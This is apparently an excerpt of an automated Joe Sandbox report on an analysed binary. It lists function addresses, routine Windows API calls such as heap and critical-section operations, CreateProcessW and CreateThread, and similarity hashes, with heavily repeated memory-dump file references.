Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: f1d0cdb06369a1a0b8861994390930e296cae0e10e06fbfec4cbf1e65083ee11
Instruction ID: 4f720c970f2f6c782f7f8672b6d4c4716e935083ff82788b95263b0a34ed632b
Opcode Fuzzy Hash: f1d0cdb06369a1a0b8861994390930e296cae0e10e06fbfec4cbf1e65083ee11
Instruction Fuzzy Hash: 2101D631B14690DBD721CF69EC44B5A77E8EB4A720F00427AF905C7790DE36AC00C794

Function 0074C040 Relevance: 2.8, APIs: 2, Instructions: 335COMMON

Download Yara Rule

APIs

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(00DAABD0,?,0542D994,0542D994,00000000,BBFE6088,?,00000000,0542D994), ref: 0074C194
LeaveCriticalSection.KERNEL32(00DAABD0,0542D994,00000000,?,0542D994,0542D994,00000000,BBFE6088,?,00000000,0542D994), ref: 0074C442

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 10ca59fe8885405cd1cacf647db10dbeadece4c0fd192e77dc773c4bb1becc76
Instruction ID: 891f7748191030dcbafcbae9b07e4632103e7382243fe741e6ab6888aef6192b
Opcode Fuzzy Hash: 10ca59fe8885405cd1cacf647db10dbeadece4c0fd192e77dc773c4bb1becc76
Instruction Fuzzy Hash: 5ED1ED70905398DFDF62DFA8C8587EDBBB0AF06310F144169E845AB392DB789D09CB61

Function 007433E0 Relevance: 2.7, APIs: 2, Instructions: 243memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?), ref: 00743493
HeapFree.KERNEL32(00000000,?), ref: 00743609

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 691685a5357ad882ab5230b763256a6ac9fff17001261d04557bf09efd4ae758
Instruction ID: 92bbbdbb3fb9e681a2dd114bba40948c41b245ed44f200c4d2afab4c9f1e3379
Opcode Fuzzy Hash: 691685a5357ad882ab5230b763256a6ac9fff17001261d04557bf09efd4ae758
Instruction Fuzzy Hash: FA915A70A01209EFDB24CF98C898BAEB7B5EF49314F10459DE419AB390C779AE45CF91

Function 0072D600 Relevance: 2.7, APIs: 2, Instructions: 199COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,?,?,BBFE6088,?,?), ref: 0072D68E
LeaveCriticalSection.KERNEL32(?,BBFE6088,00000000,?,?), ref: 0072D80E

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 49b357f0fdd76ad914ea22ba9cff9f7d0b9026b4014eaf6661cfea01d74b9e3a
Instruction ID: 5fc52eeeeaa8f686a6cf72893988032439780fb66bad606da130f75287fc524b
Opcode Fuzzy Hash: 49b357f0fdd76ad914ea22ba9cff9f7d0b9026b4014eaf6661cfea01d74b9e3a
Instruction Fuzzy Hash: 0971C171A00215DFDB20CF58D885BAEFBB4FF49314F14826AE914A7392D779AD00CBA0

Function 009B1BE0 Relevance: 2.6, APIs: 2, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 009B1C45

Part of subcall function 0097D690: HeapFree.KERNEL32(00000000,?,?,?), ref: 0097D7A8

Part of subcall function 009ADDD0: GetProcessHeap.KERNEL32(BBFE6088,00000000), ref: 009ADE17
Part of subcall function 009ADDD0: HeapAlloc.KERNEL32(03400000,00000000,00000054,BBFE6088,00000000), ref: 009ADE34

HeapAlloc.KERNEL32(03400000,00000000,0000001C), ref: 009B1C62

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess$Free
String ID:
API String ID: 2487664458-0
Opcode ID: ba7fe9aafa930849b46f496d0e844d82e55f967de96027c2210dc7e37af34a55
Instruction ID: 32a31f47094896a1c238257314575764f248322e41e66feaefb0d8f638e00ed6
Opcode Fuzzy Hash: ba7fe9aafa930849b46f496d0e844d82e55f967de96027c2210dc7e37af34a55
Instruction Fuzzy Hash: 0C51AEB1E00619DBDB11DF68C9547AEFBF4FF88724F104259D814AB391D7B9A9408BE0

Function 009ADDD0 Relevance: 2.6, APIs: 2, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(BBFE6088,00000000), ref: 009ADE17
HeapAlloc.KERNEL32(03400000,00000000,00000054,BBFE6088,00000000), ref: 009ADE34

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 2599331b05a2c2317766c65c4f67fb263b2fbd7090fde139fe0db9a36d9e3a81
Instruction ID: 4341f9f94d8998a34415aee6f84d6b59833793ca04f6e59c168a8b5437289400
Opcode Fuzzy Hash: 2599331b05a2c2317766c65c4f67fb263b2fbd7090fde139fe0db9a36d9e3a81
Instruction Fuzzy Hash: F6412170A01348CBDB21CF69C84439FBBB8EF56714F20421EE9129B380C7B68A01CBD0

Function 009B6B30 Relevance: 1.7, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00DB3F64,00DB3F62,00000004,00000000), ref: 009B6CEA

Part of subcall function 0071F1C0: HeapFree.KERNEL32(00000000,?,80131623,?,?,00000002), ref: 0071F1FD

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeapwcscpy_s
String ID:
API String ID: 1989758669-0
Opcode ID: c8f427e9fed31ea6c05858b5a552f3efd8490cfd70916850f0a30e88e1fbf0cc
Instruction ID: 69e8bf37a328340d029730d0e89928df7e92f39ba8ca8faf2ccdb507b9425626
Opcode Fuzzy Hash: c8f427e9fed31ea6c05858b5a552f3efd8490cfd70916850f0a30e88e1fbf0cc
Instruction Fuzzy Hash: 1CB14670D06268DFDB20DF68C99879DBBB0EB49314F1482D9D809AB291DB796F84CF50

Function 0544C9C3 Relevance: 1.6, APIs: 1, Instructions: 122processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 0544CABF

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7f81e3f75d5cd2fcb56b0de9d1c2408ddd6c55aef75ccf387b54bbb810829bbc
Instruction ID: 3569384981f46448d83245809a06f369b7f4a629ec6b89845cc6042689d6261e
Opcode Fuzzy Hash: 7f81e3f75d5cd2fcb56b0de9d1c2408ddd6c55aef75ccf387b54bbb810829bbc
Instruction Fuzzy Hash: 8C517AB5E052199FCF18CFE8E8949EDBBB2BB48300F14816EE81AA7390CB305955DF55

Function 007DA260 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,00010004,?), ref: 007DA2B3

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e1feb5a5ca1670b22906639024ef7f0a92734cfec56ee4f4e16c728db97dcb18
Instruction ID: f4bc24acfc24cb754c5a9548737c9c3e78d4f129242e986e001983db879f7200
Opcode Fuzzy Hash: e1feb5a5ca1670b22906639024ef7f0a92734cfec56ee4f4e16c728db97dcb18
Instruction Fuzzy Hash: 9501C4326012156FC7219E29D801BDAB7A8FB95761F00412BFD58C7340EBB6E950C7D2

Function 008A8A20 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,?,00000000,0000000C,?,?,008A8B78,0000000C,BBFE6088,00000000,00000000,?,?,00000000,00C35AB0,000000FF), ref: 008A8A47

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9e666fe68e637facd319e0c21ec42ee6a85ecba5728a1062582bbe633793b095
Instruction ID: 5aa913bc8f73f42de22be4fbc5725af5009cfa8991273f491545260da28b17ff
Opcode Fuzzy Hash: 9e666fe68e637facd319e0c21ec42ee6a85ecba5728a1062582bbe633793b095
Instruction Fuzzy Hash: B5E0ED72600224EBEF209F19E884B95BBEDEB46760F150076EE04EB655C7B1BC508AB5

Function 0096F4C0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,74FDD070,BBFE6088,?,00C13A20,000000FF,?,00C09541,74FDD070,?,00983A96,00000000,00000030,BBFE6088,?,00000000), ref: 0096F4F2

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1b30e5878898e1d5abac0f6162889b231c87d670ffc646ed3fa567a5c1ce7aa7
Instruction ID: a4670c384c360ac111e1052836644bb9b01471fe172016ec6f0333329a14fa9f
Opcode Fuzzy Hash: 1b30e5878898e1d5abac0f6162889b231c87d670ffc646ed3fa567a5c1ce7aa7
Instruction Fuzzy Hash: 48E06531A88688EBC710CF49EC41F5AB7E8E709B10F10426AB819C2B90DB35A9008A64

Function 007BD1A0 Relevance: 1.5, APIs: 1, Instructions: 262COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(00DAABD0,?,BBFE6088,?,0542D994,0542D994), ref: 007BD2F7

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: 9acafd286d2da64d3ed85204f97c1d7fae57c14ea18658eeac71d96dd50de420
Instruction ID: 23e45f6ebfbe376caf88d43503f3ea25d36989894b5adf1bf082a2fd39611f6c
Opcode Fuzzy Hash: 9acafd286d2da64d3ed85204f97c1d7fae57c14ea18658eeac71d96dd50de420
Instruction Fuzzy Hash: 38A1BB70A00285CBDB29DF68C499BEEBBB1FF45304F044169D8059B392EB3DAC45CBA1

Function 007D2560 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

Part of subcall function 0072D600: LeaveCriticalSection.KERNEL32(?,?,?,?,BBFE6088,?,?), ref: 0072D68E

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(03427A4C,BBFE6088,?,00000000,00000000,BBFE6088,?,00000000), ref: 007D2754

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 9aff482e4b8b162abad8e85fdb0516f2d98570cb7d371f95d5d797ad28965679
Instruction ID: 54757a27e2a6c72583a237d8e1a011fd992142c3bfa1c5af87d9bd208a68f0ef
Opcode Fuzzy Hash: 9aff482e4b8b162abad8e85fdb0516f2d98570cb7d371f95d5d797ad28965679
Instruction Fuzzy Hash: A771D171A01305DFDB24DF58C945B9AFBB4EF54720F14816BE915A73E2CB789902CBA0

Function 00B71F80 Relevance: 1.4, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 0074F7B0: EnterCriticalSection.KERNEL32(74FDD070,?,74FDD070,?,74FDD070,?,008384AE,?,00983B95), ref: 0074F839

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,BBFE6088,?,?), ref: 00B720F1

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 79eb3882e2294b68f42e53843ac3e88b11ecbcaa5e7746af9033f9392581e7c1
Instruction ID: e81ada775819d904c4ef56821699f8629e141933615a117e6e0bf7d2c737760b
Opcode Fuzzy Hash: 79eb3882e2294b68f42e53843ac3e88b11ecbcaa5e7746af9033f9392581e7c1
Instruction Fuzzy Hash: 9C513A75A002098FCB15CFA9C880AAEBBF5FB4C310F148569E929E7391D735A941CBA4

Function 00B73140 Relevance: 1.4, APIs: 1, Instructions: 127COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,-00000010,00000010,00000000,?,?,?,?,?,?), ref: 00B7328A

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalLeaveSection
String ID:
API String ID: 3988221542-0
Opcode ID: a0856047289de0e06131907d2dd588e4269acc4faefe21cc39bb44eb8f477f58
Instruction ID: feb56693749decd1d0118089ac80859c15dcad9391b1565d39247bbd768204e3
Opcode Fuzzy Hash: a0856047289de0e06131907d2dd588e4269acc4faefe21cc39bb44eb8f477f58
Instruction Fuzzy Hash: 5B516CB1A00248DFDB14CFA8C884BDEBBF5FB49314F1445A9E815E7392D775AA04CBA0

Function 0071CFB0 Relevance: 1.3, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32(?,?,BBFE6088,?,00000000), ref: 0071D034

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

